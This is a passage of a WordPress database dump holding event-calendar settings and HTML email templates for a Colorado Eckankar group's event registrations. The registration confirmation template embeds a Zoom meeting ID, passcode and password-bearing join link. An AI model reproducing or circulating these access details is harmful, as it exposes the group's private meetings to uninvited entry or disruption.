background-color: #f1f1f1; width: 100%;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr style=\"vertical-align: top;\">\r\n<td style=\"word-break: break-word; border-collapse: collapse !important; vertical-align: top;\">\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"height: 100%; width: 100% !important;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border: 0px solid transparent;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif; background-color: #efefef;\" align=\"left\">\r\n<div>\r\n<div style=\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 28px; font-weight: bold; color: #f28a27;\">\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px;\">Admin Notification</span></div>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 1px solid #CCC;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div style=\"text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n<div style=\"text-align: center;\"><br />\r\n<span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span>\r\n<p> <span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></p>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #e8e8e8; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div>\r\n<p style=\"padding: 20px; font-size: 16px; line-height: 22px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\"><span style=\"font-size: 14pt;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #6e6e6e; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div style=\"text-align: center; font-family: arial, helvetica, sans-serif;\"><a href=\"https://www.facebook.com/people/Eckankar-in-Colorado/100067829705562/\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /></a>\r\n<p style=\"text-align: center; font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado<br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\";}}'),(159425,266544,'mec_color',''),(159409,266543,'mec_event_status','EventScheduled'),(159410,266543,'mec_moved_online_link',''),(159411,266543,'mec_cancelled_reason',''),(159412,266543,'mec_display_cancellation_reason_in_single_page',''),(159413,266543,'protect_children',''),(159414,266543,'passster_activate_global_protection',NULL),(159415,266543,'passster_activate_protection',NULL),(159416,266543,'passster_protection_type','password'),(159417,266543,'boldgrid_hide_page_title','0'),(159426,266544,'mec_location_id','118'),(159419,266543,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(159420,266543,'boldgrid_in_page_containers','1'),(159422,266543,'_dp_original','266522'),(159423,266543,'_edit_lock','1693158346:2'),(159424,266543,'_edit_last','2'),(159427,266544,'mec_dont_show_map','0'),(159428,266544,'mec_organizer_id','1'),(159429,266544,'mec_read_more',''),(159430,266544,'mec_more_info',''),(159431,266544,'mec_more_info_title',''),(159432,266544,'mec_more_info_target','_self'),(159433,266544,'mec_cost',''),(159434,266544,'mec_currency','a:0:{}'),(159435,266544,'mec_additional_organizer_ids','a:0:{}'),(159436,266544,'mec_additional_location_ids','a:0:{}'),(159437,266544,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2027-08-15\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2027-08-15\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(159438,266544,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(159439,266544,'mec_certain_weekdays','a:0:{}'),(159440,266544,'mec_allday','0'),(159441,266544,'one_occurrence','0'),(159442,266544,'mec_hide_time','0'),(159443,266544,'mec_hide_end_time','0'),(159444,266544,'mec_comment',''),(159445,266544,'mec_timezone','global'),(159446,266544,'mec_countdown_method','global'),(159447,266544,'mec_public','1'),(159448,266544,'mec_start_date','2027-08-15'),(159449,266544,'mec_start_time_hour','10'),(159450,266544,'mec_start_time_minutes','30'),(159451,266544,'mec_start_time_ampm','AM'),(159452,266544,'mec_start_day_seconds','37800'),(159453,266544,'mec_end_date','2027-08-15'),(159454,266544,'mec_end_time_hour','11'),(159455,266544,'mec_end_time_minutes','30'),(159456,266544,'mec_end_time_ampm','PM'),(159457,266544,'mec_end_day_seconds','84600'),(159458,266544,'mec_repeat_status','0'),(159459,266544,'mec_repeat_type',''),(159460,266544,'mec_repeat_interval','1'),(159461,266544,'mec_repeat_end',''),(159462,266544,'mec_repeat_end_at_occurrences',''),(159463,266544,'mec_repeat_end_at_date',''),(159464,266544,'mec_advanced_days','a:0:{}'),(159465,266544,'mec_in_days',''),(159466,266544,'mec_not_in_days',''),(159467,266544,'mec_hourly_schedules','a:0:{}'),(159468,266544,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(159469,266544,'mec_tickets','a:1:{i:1;a:17:{s:4:\"name\";s:24:\"Title of Event Goes Here\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}}}'),(159470,266544,'mec_fees_global_inheritance','1'),(159471,266544,'mec_fees','a:0:{}'),(159472,266544,'mec_ticket_variations_global_inheritance','1'),(159473,266544,'mec_ticket_variations','a:0:{}'),(159474,266544,'mec_reg_fields_global_inheritance','1'),(159475,266544,'mec_reg_fields','a:0:{}'),(159476,266544,'mec_bfixed_fields','a:0:{}'),(159477,266544,'mec_op','a:0:{}'),(159478,266544,'mec_fields','a:0:{}'),(159479,266544,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6128:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b> 923 1691 4318<br />\r\n<b>Passcode:</b> 938668</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://zoom.us/j/92316914318?pwd=VHFxMFJ3T3FhcSt6eUZlejZ6bXRaUT09\">https://zoom.us/j/92316914318?pwd=VHFxMFJ3T3FhcSt6eUZlejZ6bXRaUT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:9914:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> 